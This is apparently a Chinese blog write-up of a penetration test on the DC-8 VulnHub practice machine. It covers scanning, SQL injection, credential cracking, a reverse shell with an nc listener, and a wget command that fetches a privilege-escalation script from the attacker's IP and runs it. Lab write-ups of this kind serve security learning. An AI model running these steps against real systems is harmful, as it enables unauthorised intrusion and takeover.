DC8-vulnhub渗透测试

前言

DC:8-vulnhub渗透测试

靶机IP:192.168.0.13

KALIIP:192.168.0.9

渗透过程

nmap 扫描

1
nmap -sT -sC -sV -Pn -vv 192.168.0.13

image-20200216001149500

访问80端口的时候,发现这里有一条路由是长这样的.

image-20200216002831091

sqlmap跑一下,这里是有sql注入的。

image-20200216003149994

然后一路跑库,然后里面的数据,暂时没有发现有什么用

当时nmap扫出的一些东西,看看有什么用,发现没什么用。

image-20200216170324615

dirb跑出这里有一user目录

image-20200216175445428

这里需要账号密码,然后之前跑库跑出了一个

image-20200216192147838

然后爆破一下,得到john:turtle

image-20200216192233998

然后到主页

image-20200216200820145

image-20200216200853044

image-20200216200950108

然后这个页面用于反弹shell

image-20200216201504301

kali监听4567端口

1
nc -lvp 4567

然后我们访问

1
http://192.168.0.13/node/3

image-20200216201648793

submit一下,获得shell

获得tty

1
python -c "import pty; pty.spawn('/bin/bash')"

重点——————————-新知识

查看哪些命令是有suid权限

1
find -perm -u=s -type f 2>/dev/null

image-20200216202221467

查看版本

image-20200216202422549

image-20200216203612773

下载这个sh文件,然后记得用dos2unix转码sh文件

然后靶机中下载该sh文件

1
2
3
cd tmp
wget http://192.168.0.9/getshell.sh
./getshell.sh -m netcat

image-20200216205249965

总结

对Linux的命令不够熟悉,在使用sh的exp之前记得先用dos2unix转换

参考文章:

https://www.cnblogs.com/ftl1012/p/9249279.html

https://www.cnblogs.com/MartinChentf/p/6056571.html

Author: 我是小吴啦
Link: http://yoursite.com/2020/02/25/DC8-vulnhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.